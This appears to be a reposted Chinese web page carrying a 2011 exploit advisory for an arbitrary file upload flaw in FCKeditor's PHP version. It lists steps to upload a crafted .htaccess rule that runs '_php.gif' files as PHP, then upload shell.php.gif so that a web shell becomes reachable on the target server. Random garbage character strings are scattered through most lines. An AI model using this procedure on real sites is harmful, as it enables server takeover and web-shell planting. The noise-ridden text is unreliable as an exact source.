FCKeditor所有php版本Upload上传漏洞% _6 U- x, \( c9 U
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
t5 { P% o2 z1 H% g9 q6 Z减小字体 增大字体( |- K7 s# F' J) q/ q5 b1 O* }" X' t
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability7 i& z' j& x# Z& h. r. H
[+] Date: 2011
6 U! e5 K) ]* F8 ^% H: z[+] Author : sinesafe.cn2 J' H3 m! c# I# z+ L
[+] Website : WwW.sinesafe.cn& y: Q6 G, S8 f$ S4 a* }8 `
———————————————————/ h2 z6 X, h2 h9 t L) Y3 S
1.create a htaccess file:
% p. @' A# K# w: z& I3 Y$ Xcode:1 g1 H/ a7 H7 i8 E% b
<FilesMatch “_php.gif”>
+ ~7 p. G$ q6 j! B5 n0 |SetHandler application/x-httpd-php2 y: B/ N! m5 x; |
</FilesMatch>* I# M5 X f; t+ T B* B" P9 E
% e, h! j! z9 ~3 |# [2.Now upload this htaccess with FCKeditor.
' b) o4 a* e7 \. w) H3 q5 p5 p! d3 M
! j7 g) e: {) Qhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
6 S: x% `; H; }7 Y) ~
9 e p4 S6 j% v& w. _( T0 @, qhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html% V8 w4 s l" d6 K9 h! v4 r
. {3 e. Y$ o& _8 H———————————————————————————————-; ?0 S0 D# ]5 n& a; e
3.Now upload shell.php.gif with FCKeditor.
' q/ A3 k, D9 w7 m6 r& ~" m4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.# d, x7 B6 p" H( D+ i& z( p* |1 [
5.http://www.sinesafe.cn/anything/shell_php.gif6 _) f8 r: m% {! r" W% D2 \! d
6.Now shell is available from server. |
; Y! o/ t/ t5 M. U
, |+ h* o2 u6 j
7 @0 A, `9 w5 u' B
|
发表于 2013-10-27 17:25:21
收藏
支持
反对